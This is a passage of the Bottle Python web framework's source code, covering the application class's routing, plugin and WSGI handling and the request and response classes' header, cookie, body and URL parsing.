routes of another :class:`Bottle` application or a list of\n            :class:`Route` objects into this application. The routes keep their\n            'owner', meaning that the :data:`Route.app` attribute is not\n            changed. \"\"\"\n        if isinstance(routes, Bottle):\n            routes = routes.routes\n        for route in routes:\n            self.add_route(route)\n\n    def install(self, plugin):\n        \"\"\" Add a plugin to the list of plugins and prepare it for being\n            applied to all routes of this application. A plugin may be a simple\n            decorator or an object that implements the :class:`Plugin` API.\n        \"\"\"\n        if hasattr(plugin, 'setup'): plugin.setup(self)\n        if not callable(plugin) and not hasattr(plugin, 'apply'):\n            raise TypeError(\"Plugins must be callable or implement .apply()\")\n        self.plugins.append(plugin)\n        self.reset()\n        return plugin\n\n    def uninstall(self, plugin):\n        \"\"\" Uninstall plugins. Pass an instance to remove a specific plugin, a type\n            object to remove all plugins that match that type, a string to remove\n            all plugins with a matching ``name`` attribute or ``True`` to remove all\n            plugins. Return the list of removed plugins. \"\"\"\n        removed, remove = [], plugin\n        for i, plugin in list(enumerate(self.plugins))[::-1]:\n            if remove is True or remove is plugin or remove is type(plugin) \\\n            or getattr(plugin, 'name', True) == remove:\n                removed.append(plugin)\n                del self.plugins[i]\n                if hasattr(plugin, 'close'): plugin.close()\n        if removed: self.reset()\n        return removed\n\n    def reset(self, route=None):\n        \"\"\" Reset all routes (force plugins to be re-applied) and clear all\n            caches. If an ID or route object is given, only that specific route\n            is affected. \"\"\"\n        if route is None: routes = self.routes\n        elif isinstance(route, Route): routes = [route]\n        else: routes = [self.routes[route]]\n        for route in routes:\n            route.reset()\n        if DEBUG:\n            for route in routes:\n                route.prepare()\n        self.trigger_hook('app_reset')\n\n    def close(self):\n        \"\"\" Close the application and all installed plugins. \"\"\"\n        for plugin in self.plugins:\n            if hasattr(plugin, 'close'): plugin.close()\n\n    def run(self, **kwargs):\n        \"\"\" Calls :func:`run` with the same parameters. \"\"\"\n        run(self, **kwargs)\n\n    def match(self, environ):\n        \"\"\" Search for a matching route and return a (:class:`Route`, urlargs)\n            tuple. The second value is a dictionary with parameters extracted\n            from the URL. Raise :exc:`HTTPError` (404/405) on a non-match.\"\"\"\n        return self.router.match(environ)\n\n    def get_url(self, routename, **kargs):\n        \"\"\" Return a string that matches a named route \"\"\"\n        scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/'\n        location = self.router.build(routename, **kargs).lstrip('/')\n        return urljoin(urljoin('/', scriptname), location)\n\n    def add_route(self, route):\n        \"\"\" Add a route object, but do not change the :data:`Route.app`\n            attribute.\"\"\"\n        self.routes.append(route)\n        self.router.add(route.rule, route.method, route, name=route.name)\n        if DEBUG: route.prepare()\n\n    def route(self,\n              path=None,\n              method='GET',\n              callback=None,\n              name=None,\n              apply=None,\n              skip=None, **config):\n        \"\"\" A decorator to bind a function to a request URL. Example::\n\n                @app.route('/hello/<name>')\n                def hello(name):\n                    return 'Hello %s' % name\n\n            The ``<name>`` part is a wildcard. See :class:`Router` for syntax\n            details.\n\n            :param path: Request path or a list of paths to listen to. If no\n              path is specified, it is automatically generated from the\n              signature of the function.\n            :param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of\n              methods to listen to. (default: `GET`)\n            :param callback: An optional shortcut to avoid the decorator\n              syntax. ``route(..., callback=func)`` equals ``route(...)(func)``\n            :param name: The name for this route. (default: None)\n            :param apply: A decorator or plugin or a list of plugins. These are\n              applied to the route callback in addition to installed plugins.\n            :param skip: A list of plugins, plugin classes or names. Matching\n              plugins are not installed to this route. ``True`` skips all.\n\n            Any additional keyword arguments are stored as route-specific\n            configuration and passed to plugins (see :meth:`Plugin.apply`).\n        \"\"\"\n        if callable(path): path, callback = None, path\n        plugins = makelist(apply)\n        skiplist = makelist(skip)\n\n        def decorator(callback):\n            if isinstance(callback, basestring): callback = load(callback)\n            for rule in makelist(path) or yieldroutes(callback):\n                for verb in makelist(method):\n                    verb = verb.upper()\n                    route = Route(self, rule, verb, callback,\n                                  name=name,\n                                  plugins=plugins,\n                                  skiplist=skiplist, **config)\n                    self.add_route(route)\n            return callback\n\n        return decorator(callback) if callback else decorator\n\n    def get(self, path=None, method='GET', **options):\n        \"\"\" Equals :meth:`route`. \"\"\"\n        return self.route(path, method, **options)\n\n    def post(self, path=None, method='POST', **options):\n        \"\"\" Equals :meth:`route` with a ``POST`` method parameter. \"\"\"\n        return self.route(path, method, **options)\n\n    def put(self, path=None, method='PUT', **options):\n        \"\"\" Equals :meth:`route` with a ``PUT`` method parameter. \"\"\"\n        return self.route(path, method, **options)\n\n    def delete(self, path=None, method='DELETE', **options):\n        \"\"\" Equals :meth:`route` with a ``DELETE`` method parameter. \"\"\"\n        return self.route(path, method, **options)\n\n    def patch(self, path=None, method='PATCH', **options):\n        \"\"\" Equals :meth:`route` with a ``PATCH`` method parameter. \"\"\"\n        return self.route(path, method, **options)\n\n    def error(self, code=500, callback=None):\n        \"\"\" Register an output handler for a HTTP error code. Can\n            be used as a decorator or called directly ::\n\n                def error_handler_500(error):\n                    return 'error_handler_500'\n\n                app.error(code=500, callback=error_handler_500)\n\n                @app.error(404)\n                def error_handler_404(error):\n                    return 'error_handler_404'\n\n        \"\"\"\n\n        def decorator(callback):\n            if isinstance(callback, basestring): callback = load(callback)\n            self.error_handler[int(code)] = callback\n            return callback\n\n        return decorator(callback) if callback else decorator\n\n    def default_error_handler(self, res):\n        return tob(template(ERROR_PAGE_TEMPLATE, e=res, template_settings=dict(name='__ERROR_PAGE_TEMPLATE')))\n\n    def _handle(self, environ):\n        path = environ['bottle.raw_path'] = environ['PATH_INFO']\n        if py3k:\n            environ['PATH_INFO'] = path.encode('latin1').decode('utf8', 'ignore')\n\n        environ['bottle.app'] = self\n        request.bind(environ)\n        response.bind()\n\n        try:\n            while True: # Remove in 0.14 together with RouteReset\n                out = None\n                try:\n                    self.trigger_hook('before_request')\n                    route, args = self.router.match(environ)\n                    environ['route.handle'] = route\n                    environ['bottle.route'] = route\n                    environ['route.url_args'] = args\n                    out = route.call(**args)\n                    break\n                except HTTPResponse as E:\n                    out = E\n                    break\n                except RouteReset:\n                    depr(0, 13, \"RouteReset exception deprecated\",\n                                \"Call route.call() after route.reset() and \"\n                                \"return the result.\")\n                    route.reset()\n                    continue\n                finally:\n                    if isinstance(out, HTTPResponse):\n                        out.apply(response)\n                    try:\n                        self.trigger_hook('after_request')\n                    except HTTPResponse as E:\n                        out = E\n                        out.apply(response)\n        except (KeyboardInterrupt, SystemExit, MemoryError):\n            raise\n        except Exception as E:\n            if not self.catchall: raise\n            stacktrace = format_exc()\n            environ['wsgi.errors'].write(stacktrace)\n            environ['wsgi.errors'].flush()\n            environ['bottle.exc_info'] = sys.exc_info()\n            out = HTTPError(500, \"Internal Server Error\", E, stacktrace)\n            out.apply(response)\n\n        return out\n\n    def _cast(self, out, peek=None):\n        \"\"\" Try to convert the parameter into something WSGI compatible and set\n        correct HTTP headers when possible.\n        Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like,\n        iterable of strings and iterable of unicodes\n        \"\"\"\n\n        # Empty output is done here\n        if not out:\n            if 'Content-Length' not in response:\n                response['Content-Length'] = 0\n            return []\n        # Join lists of byte or unicode strings. Mixed lists are NOT supported\n        if isinstance(out, (tuple, list))\\\n        and isinstance(out[0], (bytes, unicode)):\n            out = out[0][0:0].join(out)  # b'abc'[0:0] -> b''\n        # Encode unicode strings\n        if isinstance(out, unicode):\n            out = out.encode(response.charset)\n        # Byte Strings are just returned\n        if isinstance(out, bytes):\n            if 'Content-Length' not in response:\n                response['Content-Length'] = len(out)\n            return [out]\n        # HTTPError or HTTPException (recursive, because they may wrap anything)\n        # TODO: Handle these explicitly in handle() or make them iterable.\n        if isinstance(out, HTTPError):\n            out.apply(response)\n            out = self.error_handler.get(out.status_code,\n                                         self.default_error_handler)(out)\n            return self._cast(out)\n        if isinstance(out, HTTPResponse):\n            out.apply(response)\n            return self._cast(out.body)\n\n        # File-like objects.\n        if hasattr(out, 'read'):\n            if 'wsgi.file_wrapper' in request.environ:\n                return request.environ['wsgi.file_wrapper'](out)\n            elif hasattr(out, 'close') or not hasattr(out, '__iter__'):\n                return WSGIFileWrapper(out)\n\n        # Handle Iterables. We peek into them to detect their inner type.\n        try:\n            iout = iter(out)\n            first = next(iout)\n            while not first:\n                first = next(iout)\n        except StopIteration:\n            return self._cast('')\n        except HTTPResponse as E:\n            first = E\n        except (KeyboardInterrupt, SystemExit, MemoryError):\n            raise\n        except Exception as error:\n            if not self.catchall: raise\n            first = HTTPError(500, 'Unhandled exception', error, format_exc())\n\n        # These are the inner types allowed in iterator or generator objects.\n        if isinstance(first, HTTPResponse):\n            return self._cast(first)\n        elif isinstance(first, bytes):\n            new_iter = itertools.chain([first], iout)\n        elif isinstance(first, unicode):\n            encoder = lambda x: x.encode(response.charset)\n            new_iter = imap(encoder, itertools.chain([first], iout))\n        else:\n            msg = 'Unsupported response type: %s' % type(first)\n            return self._cast(HTTPError(500, msg))\n        if hasattr(out, 'close'):\n            new_iter = _closeiter(new_iter, out.close)\n        return new_iter\n\n    def wsgi(self, environ, start_response):\n        \"\"\" The bottle WSGI-interface. \"\"\"\n        try:\n            out = self._cast(self._handle(environ))\n            # rfc2616 section 4.3\n            if response._status_code in (100, 101, 204, 304)\\\n            or environ['REQUEST_METHOD'] == 'HEAD':\n                if hasattr(out, 'close'): out.close()\n                out = []\n            exc_info = environ.get('bottle.exc_info')\n            if exc_info is not None:\n                del environ['bottle.exc_info']\n            start_response(response._wsgi_status_line(), response.headerlist, exc_info)\n            return out\n        except (KeyboardInterrupt, SystemExit, MemoryError):\n            raise\n        except Exception as E:\n            if not self.catchall: raise\n            err = '<h1>Critical error while processing request: %s</h1>' \\\n                  % html_escape(environ.get('PATH_INFO', '/'))\n            if DEBUG:\n                err += '<h2>Error:</h2>\\n<pre>\\n%s\\n</pre>\\n' \\\n                       '<h2>Traceback:</h2>\\n<pre>\\n%s\\n</pre>\\n' \\\n                       % (html_escape(repr(E)), html_escape(format_exc()))\n            environ['wsgi.errors'].write(err)\n            environ['wsgi.errors'].flush()\n            headers = [('Content-Type', 'text/html; charset=UTF-8')]\n            start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())\n            return [tob(err)]\n\n    def __call__(self, environ, start_response):\n        \"\"\" Each instance of :class:'Bottle' is a WSGI application. \"\"\"\n        return self.wsgi(environ, start_response)\n\n    def __enter__(self):\n        \"\"\" Use this application as default for all module-level shortcuts. \"\"\"\n        default_app.push(self)\n        return self\n\n    def __exit__(self, exc_type, exc_value, traceback):\n        default_app.pop()\n\n    def __setattr__(self, name, value):\n        if name in self.__dict__:\n            raise AttributeError(\"Attribute %s already defined. Plugin conflict?\" % name)\n        self.__dict__[name] = value\n\n\n###############################################################################\n# HTTP and WSGI Tools ##########################################################\n###############################################################################\n\n\nclass BaseRequest(object):\n    \"\"\" A wrapper for WSGI environment dictionaries that adds a lot of\n        convenient access methods and properties. Most of them are read-only.\n\n        Adding new attributes to a request actually adds them to the environ\n        dictionary (as 'bottle.request.ext.<name>'). This is the recommended\n        way to store and access request-specific data.\n    \"\"\"\n\n    __slots__ = ('environ', )\n\n    #: Maximum size of memory buffer for :attr:`body` in bytes.\n    MEMFILE_MAX = 102400\n\n    def __init__(self, environ=None):\n        \"\"\" Wrap a WSGI environ dictionary. \"\"\"\n        #: The wrapped WSGI environ dictionary. This is the only real attribute.\n        #: All other attributes actually are read-only properties.\n        self.environ = {} if environ is None else environ\n        self.environ['bottle.request'] = self\n\n    @DictProperty('environ', 'bottle.app', read_only=True)\n    def app(self):\n        \"\"\" Bottle application handling this request. \"\"\"\n        raise RuntimeError('This request is not connected to an application.')\n\n    @DictProperty('environ', 'bottle.route', read_only=True)\n    def route(self):\n        \"\"\" The bottle :class:`Route` object that matches this request. \"\"\"\n        raise RuntimeError('This request is not connected to a route.')\n\n    @DictProperty('environ', 'route.url_args', read_only=True)\n    def url_args(self):\n        \"\"\" The arguments extracted from the URL. \"\"\"\n        raise RuntimeError('This request is not connected to a route.')\n\n    @property\n    def path(self):\n        \"\"\" The value of ``PATH_INFO`` with exactly one prefixed slash (to fix\n            broken clients and avoid the \"empty path\" edge case). \"\"\"\n        return '/' + self.environ.get('PATH_INFO', '').lstrip('/')\n\n    @property\n    def method(self):\n        \"\"\" The ``REQUEST_METHOD`` value as an uppercase string. \"\"\"\n        return self.environ.get('REQUEST_METHOD', 'GET').upper()\n\n    @DictProperty('environ', 'bottle.request.headers', read_only=True)\n    def headers(self):\n        \"\"\" A :class:`WSGIHeaderDict` that provides case-insensitive access to\n            HTTP request headers. \"\"\"\n        return WSGIHeaderDict(self.environ)\n\n    def get_header(self, name, default=None):\n        \"\"\" Return the value of a request header, or a given default value. \"\"\"\n        return self.headers.get(name, default)\n\n    @DictProperty('environ', 'bottle.request.cookies', read_only=True)\n    def cookies(self):\n        \"\"\" Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT\n            decoded. Use :meth:`get_cookie` if you expect signed cookies. \"\"\"\n        cookies = SimpleCookie(self.environ.get('HTTP_COOKIE', '')).values()\n        return FormsDict((c.key, c.value) for c in cookies)\n\n    def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):\n        \"\"\" Return the content of a cookie. To read a `Signed Cookie`, the\n            `secret` must match the one used to create the cookie (see\n            :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing\n            cookie or wrong signature), return a default value. \"\"\"\n        value = self.cookies.get(key)\n        if secret:\n            # See BaseResponse.set_cookie for details on signed cookies.\n            if value and value.startswith('!') and '?' in value:\n                sig, msg = map(tob, value[1:].split('?', 1))\n                hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()\n                if _lscmp(sig, base64.b64encode(hash)):\n                    dst = pickle.loads(base64.b64decode(msg))\n                    if dst and dst[0] == key:\n                        return dst[1]\n            return default\n        return value or default\n\n    @DictProperty('environ', 'bottle.request.query', read_only=True)\n    def query(self):\n        \"\"\" The :attr:`query_string` parsed into a :class:`FormsDict`. These\n            values are sometimes called \"URL arguments\" or \"GET parameters\", but\n            not to be confused with \"URL wildcards\" as they are provided by the\n            :class:`Router`. \"\"\"\n        get = self.environ['bottle.get'] = FormsDict()\n        pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))\n        for key, value in pairs:\n            get[key] = value\n        return get\n\n    @DictProperty('environ', 'bottle.request.forms', read_only=True)\n    def forms(self):\n        \"\"\" Form values parsed from an `url-encoded` or `multipart/form-data`\n            encoded POST or PUT request body. The result is returned as a\n            :class:`FormsDict`. All keys and values are strings. File uploads\n            are stored separately in :attr:`files`. \"\"\"\n        forms = FormsDict()\n        forms.recode_unicode = self.POST.recode_unicode\n        for name, item in self.POST.allitems():\n            if not isinstance(item, FileUpload):\n                forms[name] = item\n        return forms\n\n    @DictProperty('environ', 'bottle.request.params', read_only=True)\n    def params(self):\n        \"\"\" A :class:`FormsDict` with the combined values of :attr:`query` and\n            :attr:`forms`. File uploads are stored in :attr:`files`. \"\"\"\n        params = FormsDict()\n        for key, value in self.query.allitems():\n            params[key] = value\n        for key, value in self.forms.allitems():\n            params[key] = value\n        return params\n\n    @DictProperty('environ', 'bottle.request.files', read_only=True)\n    def files(self):\n        \"\"\" File uploads parsed from `multipart/form-data` encoded POST or PUT\n            request body. The values are instances of :class:`FileUpload`.\n\n        \"\"\"\n        files = FormsDict()\n        files.recode_unicode = self.POST.recode_unicode\n        for name, item in self.POST.allitems():\n            if isinstance(item, FileUpload):\n                files[name] = item\n        return files\n\n    @DictProperty('environ', 'bottle.request.json', read_only=True)\n    def json(self):\n        \"\"\" If the ``Content-Type`` header is ``application/json`` or\n            ``application/json-rpc``, this property holds the parsed content\n            of the request body. Only requests smaller than :attr:`MEMFILE_MAX`\n            are processed to avoid memory exhaustion.\n            Invalid JSON raises a 400 error response.\n        \"\"\"\n        ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]\n        if ctype in ('application/json', 'application/json-rpc'):\n            b = self._get_body_string(self.MEMFILE_MAX)\n            if not b:\n                return None\n            try:\n                return json_loads(b)\n            except (ValueError, TypeError):\n                raise HTTPError(400, 'Invalid JSON')\n        return None\n\n    def _iter_body(self, read, bufsize):\n        maxread = max(0, self.content_length)\n        while maxread:\n            part = read(min(maxread, bufsize))\n            if not part: break\n            yield part\n            maxread -= len(part)\n\n    @staticmethod\n    def _iter_chunked(read, bufsize):\n        err = HTTPError(400, 'Error while parsing chunked transfer body.')\n        rn, sem, bs = tob('\\r\\n'), tob(';'), tob('')\n        while True:\n            header = read(1)\n            while header[-2:] != rn:\n                c = read(1)\n                header += c\n                if not c: raise err\n                if len(header) > bufsize: raise err\n            size, _, _ = header.partition(sem)\n            try:\n                maxread = int(tonat(size.strip()), 16)\n            except ValueError:\n                raise err\n            if maxread == 0: break\n            buff = bs\n            while maxread > 0:\n                if not buff:\n                    buff = read(min(maxread, bufsize))\n                part, buff = buff[:maxread], buff[maxread:]\n                if not part: raise err\n                yield part\n                maxread -= len(part)\n            if read(2) != rn:\n                raise err\n\n    @DictProperty('environ', 'bottle.request.body', read_only=True)\n    def _body(self):\n        try:\n            read_func = self.environ['wsgi.input'].read\n        except KeyError:\n            self.environ['wsgi.input'] = BytesIO()\n            return self.environ['wsgi.input']\n        body_iter = self._iter_chunked if self.chunked else self._iter_body\n        body, body_size, is_temp_file = BytesIO(), 0, False\n        for part in body_iter(read_func, self.MEMFILE_MAX):\n            body.write(part)\n            body_size += len(part)\n            if not is_temp_file and body_size > self.MEMFILE_MAX:\n                body, tmp = TemporaryFile(mode='w+b'), body\n                body.write(tmp.getvalue())\n                del tmp\n                is_temp_file = True\n        self.environ['wsgi.input'] = body\n        body.seek(0)\n        return body\n\n    def _get_body_string(self, maxread):\n        \"\"\" Read body into a string. Raise HTTPError(413) on requests that are\n            too large. \"\"\"\n        if self.content_length > maxread:\n            raise HTTPError(413, 'Request entity too large')\n        data = self.body.read(maxread + 1)\n        if len(data) > maxread:\n            raise HTTPError(413, 'Request entity too large')\n        return data\n\n    @property\n    def body(self):\n        \"\"\" The HTTP request body as a seek-able file-like object. Depending on\n            :attr:`MEMFILE_MAX`, this is either a temporary file or a\n            :class:`io.BytesIO` instance. Accessing this property for the first\n            time reads and replaces the ``wsgi.input`` environ variable.\n            Subsequent accesses just do a `seek(0)` on the file object. \"\"\"\n        self._body.seek(0)\n        return self._body\n\n    @property\n    def chunked(self):\n        \"\"\" True if Chunked transfer encoding was. \"\"\"\n        return 'chunked' in self.environ.get(\n            'HTTP_TRANSFER_ENCODING', '').lower()\n\n    #: An alias for :attr:`query`.\n    GET = query\n\n    @DictProperty('environ', 'bottle.request.post', read_only=True)\n    def POST(self):\n        \"\"\" The values of :attr:`forms` and :attr:`files` combined into a single\n            :class:`FormsDict`. Values are either strings (form values) or\n            instances of :class:`cgi.FieldStorage` (file uploads).\n        \"\"\"\n        post = FormsDict()\n        # We default to application/x-www-form-urlencoded for everything that\n        # is not multipart and take the fast path (also: 3.1 workaround)\n        if not self.content_type.startswith('multipart/'):\n            body = tonat(self._get_body_string(self.MEMFILE_MAX), 'latin1')\n            for key, value in _parse_qsl(body):\n                post[key] = value\n            return post\n\n        safe_env = {'QUERY_STRING': ''}  # Build a safe environment for cgi\n        for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):\n            if key in self.environ: safe_env[key] = self.environ[key]\n        args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)\n\n        if py3k:\n            args['encoding'] = 'utf8'\n            post.recode_unicode = False\n        data = cgi.FieldStorage(**args)\n        self['_cgi.FieldStorage'] = data  #http://bugs.python.org/issue18394\n        data = data.list or []\n        for item in data:\n            if item.filename is None:\n                post[item.name] = item.value\n            else:\n                post[item.name] = FileUpload(item.file, item.name,\n                                             item.filename, item.headers)\n        return post\n\n    @property\n    def url(self):\n        \"\"\" The full request URI including hostname and scheme. If your app\n            lives behind a reverse proxy or load balancer and you get confusing\n            results, make sure that the ``X-Forwarded-Host`` header is set\n            correctly. \"\"\"\n        return self.urlparts.geturl()\n\n    @DictProperty('environ', 'bottle.request.urlparts', read_only=True)\n    def urlparts(self):\n        \"\"\" The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.\n            The tuple contains (scheme, host, path, query_string and fragment),\n            but the fragment is always empty because it is not visible to the\n            server. \"\"\"\n        env = self.environ\n        http = env.get('HTTP_X_FORWARDED_PROTO') \\\n             or env.get('wsgi.url_scheme', 'http')\n        host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')\n        if not host:\n            # HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.\n            host = env.get('SERVER_NAME', '127.0.0.1')\n            port = env.get('SERVER_PORT')\n            if port and port != ('80' if http == 'http' else '443'):\n                host += ':' + port\n        path = urlquote(self.fullpath)\n        return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')\n\n    @property\n    def fullpath(self):\n        \"\"\" Request path including :attr:`script_name` (if present). \"\"\"\n        return urljoin(self.script_name, self.path.lstrip('/'))\n\n    @property\n    def query_string(self):\n        \"\"\" The raw :attr:`query` part of the URL (everything in between ``?``\n            and ``#``) as a string. \"\"\"\n        return self.environ.get('QUERY_STRING', '')\n\n    @property\n    def script_name(self):\n        \"\"\" The initial portion of the URL's `path` that was removed by a higher\n            level (server or routing middleware) before the application was\n            called. This script path is returned with leading and tailing\n            slashes. \"\"\"\n        script_name = self.environ.get('SCRIPT_NAME', '').strip('/')\n        return '/' + script_name + '/' if script_name else '/'\n\n    def path_shift(self, shift=1):\n        \"\"\" Shift path segments from :attr:`path` to :attr:`script_name` and\n            vice versa.\n\n           :param shift: The number of path segments to shift. May be negative\n                         to change the shift direction. (default: 1)\n        \"\"\"\n        script, path = path_shift(self.environ.get('SCRIPT_NAME', '/'), self.path, shift)\n        self['SCRIPT_NAME'], self['PATH_INFO'] = script, path\n\n    @property\n    def content_length(self):\n        \"\"\" The request body length as an integer. The client is responsible to\n            set this header. Otherwise, the real length of the body is unknown\n            and -1 is returned. In this case, :attr:`body` will be empty. \"\"\"\n        return int(self.environ.get('CONTENT_LENGTH') or -1)\n\n    @property\n    def content_type(self):\n        \"\"\" The Content-Type header as a lowercase-string (default: empty). \"\"\"\n        return self.environ.get('CONTENT_TYPE', '').lower()\n\n    @property\n    def is_xhr(self):\n        \"\"\" True if the request was triggered by a XMLHttpRequest. This only\n            works with JavaScript libraries that support the `X-Requested-With`\n            header (most of the popular libraries do). \"\"\"\n        requested_with = self.environ.get('HTTP_X_REQUESTED_WITH', '')\n        return requested_with.lower() == 'xmlhttprequest'\n\n    @property\n    def is_ajax(self):\n        \"\"\" Alias for :attr:`is_xhr`. \"Ajax\" is not the right term. \"\"\"\n        return self.is_xhr\n\n    @property\n    def auth(self):\n        \"\"\" HTTP authentication data as a (user, password) tuple. This\n            implementation currently supports basic (not digest) authentication\n            only. If the authentication happened at a higher level (e.g. in the\n            front web-server or a middleware), the password field is None, but\n            the user field is looked up from the ``REMOTE_USER`` environ\n            variable. On any errors, None is returned. \"\"\"\n        basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION', ''))\n        if basic: return basic\n        ruser = self.environ.get('REMOTE_USER')\n        if ruser: return (ruser, None)\n        return None\n\n    @property\n    def remote_route(self):\n        \"\"\" A list of all IPs that were involved in this request, starting with\n            the client IP and followed by zero or more proxies. This does only\n            work if all proxies support the ```X-Forwarded-For`` header. Note\n            that this information can be forged by malicious clients. \"\"\"\n        proxy = self.environ.get('HTTP_X_FORWARDED_FOR')\n        if proxy: return [ip.strip() for ip in proxy.split(',')]\n        remote = self.environ.get('REMOTE_ADDR')\n        return [remote] if remote else []\n\n    @property\n    def remote_addr(self):\n        \"\"\" The client IP as a string. Note that this information can be forged\n            by malicious clients. \"\"\"\n        route = self.remote_route\n        return route[0] if route else None\n\n    def copy(self):\n        \"\"\" Return a new :class:`Request` with a shallow :attr:`environ` copy. \"\"\"\n        return Request(self.environ.copy())\n\n    def get(self, value, default=None):\n        return self.environ.get(value, default)\n\n    def __getitem__(self, key):\n        return self.environ[key]\n\n    def __delitem__(self, key):\n        self[key] = \"\"\n        del (self.environ[key])\n\n    def __iter__(self):\n        return iter(self.environ)\n\n    def __len__(self):\n        return len(self.environ)\n\n    def keys(self):\n        return self.environ.keys()\n\n    def __setitem__(self, key, value):\n        \"\"\" Change an environ value and clear all caches that depend on it. \"\"\"\n\n        if self.environ.get('bottle.request.readonly'):\n            raise KeyError('The environ dictionary is read-only.')\n\n        self.environ[key] = value\n        todelete = ()\n\n        if key == 'wsgi.input':\n            todelete = ('body', 'forms', 'files', 'params', 'post', 'json')\n        elif key == 'QUERY_STRING':\n            todelete = ('query', 'params')\n        elif key.startswith('HTTP_'):\n            todelete = ('headers', 'cookies')\n\n        for key in todelete:\n            self.environ.pop('bottle.request.' + key, None)\n\n    def __repr__(self):\n        return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url)\n\n    def __getattr__(self, name):\n        \"\"\" Search in self.environ for additional user defined attributes. \"\"\"\n        try:\n            var = self.environ['bottle.request.ext.%s' % name]\n            return var.__get__(self) if hasattr(var, '__get__') else var\n        except KeyError:\n            raise AttributeError('Attribute %r not defined.' % name)\n\n    def __setattr__(self, name, value):\n        if name == 'environ': return object.__setattr__(self, name, value)\n        key = 'bottle.request.ext.%s' % name\n        if hasattr(self, name):\n            raise AttributeError(\"Attribute already defined: %s\" % name)\n        self.environ[key] = value\n\n    def __delattr__(self, name):\n        try:\n            del self.environ['bottle.request.ext.%s' % name]\n        except KeyError:\n            raise AttributeError(\"Attribute not defined: %s\" % name)\n\n\ndef _hkey(key):\n    if '\\n' in key or '\\r' in key or '\\0' in key:\n        raise ValueError(\"Header names must not contain control characters: %r\" % key)\n    return key.title().replace('_', '-')\n\n\ndef _hval(value):\n    value = tonat(value)\n    if '\\n' in value or '\\r' in value or '\\0' in value:\n        raise ValueError(\"Header value must not contain control characters: %r\" % value)\n    return value\n\n\nclass HeaderProperty(object):\n    def __init__(self, name, reader=None, writer=None, default=''):\n        self.name, self.default = name, default\n        self.reader, self.writer = reader, writer\n        self.__doc__ = 'Current value of the %r header.' % name.title()\n\n    def __get__(self, obj, _):\n        if obj is None: return self\n        value = obj.get_header(self.name, self.default)\n        return self.reader(value) if self.reader else value\n\n    def __set__(self, obj, value):\n        obj[self.name] = self.writer(value) if self.writer else value\n\n    def __delete__(self, obj):\n        del obj[self.name]\n\n\nclass BaseResponse(object):\n    \"\"\" Storage class for a response body as well as headers and cookies.\n\n        This class does support dict-like case-insensitive item-access to\n        headers, but is NOT a dict. Most notably, iterating over a response\n        yields parts of the body and not the headers.\n\n        :param body: The response body as one of the supported types.\n        :param status: Either an HTTP status code (e.g. 200) or a status line\n                       including the reason phrase (e.g. '200 OK').\n        :param headers: A dictionary or a list of name-value pairs.\n\n        Additional keyword arguments are added to the list of headers.\n        Underscores in the header name are replaced with dashes.\n    \"\"\"\n\n    default_status = 200\n    default_content_type = 'text/html; charset=UTF-8'\n\n    # Header denylist for specific response codes\n    # (rfc2616 section 10.2.3 and 10.3.5)\n    bad_headers = {\n        204: frozenset(('Content-Type', 'Content-Length')),\n        304: frozenset(('Allow', 'Content-Encoding', 'Content-Language',\n                  'Content-Length', 'Content-Range', 'Content-Type',\n                  'Content-Md5', 'Last-Modified'))\n    }\n\n    def __init__(self, body='', status=None, headers=None, **more_headers):\n        self._cookies = None\n        self._headers = {}\n        self.body = body\n        self.status = status or self.default_status\n        if headers:\n            if isinstance(headers, dict):\n                headers = headers.items()\n            for name, value in headers:\n                self.add_header(name, value)\n        if more_headers:\n            for name, value in more_headers.items():\n                self.add_header(name, value)\n\n    def copy(self, cls=None):\n        \"\"\" Returns a copy of self. \"\"\"\n        cls = cls or BaseResponse\n        assert issubclass(cls, BaseResponse)\n        copy = cls()\n        copy.status = self.status\n        copy._headers = dict((k, v[:]) for (k, v) in self._headers.items())\n        if self._cookies:\n            cookies = copy._cookies = SimpleCookie()\n            for k,v in self._cookies.items():\n                cookies[k] = v.value\n                cookies[k].update(v) # also copy cookie attributes\n        return copy\n\n    def __iter__(self):\n        return iter(self.body)\n\n    def close(self):\n        if hasattr(self.body, 'close'):\n            self.body.close()\n\n    @property\n    def status_line(self):\n        \"\"\" The HTTP status line as a string (e.g. ``404 Not Found``).\"\"\"\n        return self._status_line\n\n    @property\n    def status_code(self):\n        \"\"\" The HTTP status code as an integer (e.g. 404).\"\"\"\n        return self._status_code\n\n    def _set_status(self, status):\n        if isinstance(status, int):\n            code, status = status, _HTTP_STATUS_LINES.get(status)\n        elif ' ' in status:\n            if '\\n' in status or '\\r' in status or '\\0' in status:\n                raise ValueError('Status line must not include control chars.')\n            status = status.strip()\n            code = int(status.split()[0])\n        else:\n            raise ValueError('String status line without a reason phrase.')\n        if not 100 <= code <= 999:\n            raise ValueError('Status code out of range.')\n        self._status_code = code\n        self._status_line = str(status or ('%d Unknown' % code))\n\n    def _get_status(self):\n        return self._status_line\n\n    status = property(\n        _get_status, _set_status, None,\n        ''' A writeable property to change the HTTP response status. It accepts\n            either a numeric code (100-999) or a string with a custom reason\n            phrase (e.g. \"404 Brain not found\"). Both :data:`status_line` and\n            :data:`status_code` are updated accordingly. The return value is\n            always a status string. ''')\n    del _get_status, _set_status\n\n    @property\n    def headers(self):\n        \"\"\" An instance of :class:`HeaderDict`, a case-insensitive dict-like\n            view on the response headers. \"\"\"\n        hdict = HeaderDict()\n        hdict.dict = self._headers\n        return hdict\n\n    def __contains__(self, name):\n        return _hkey(name) in self._headers\n\n    def __delitem__(self, name):\n        del self._headers[_hkey(name)]\n\n    def __getitem__(self, name):\n        return self._headers[_hkey(name)][-1]\n\n    def __setitem__(self, name, value):\n        self._headers[_hkey(name)] = 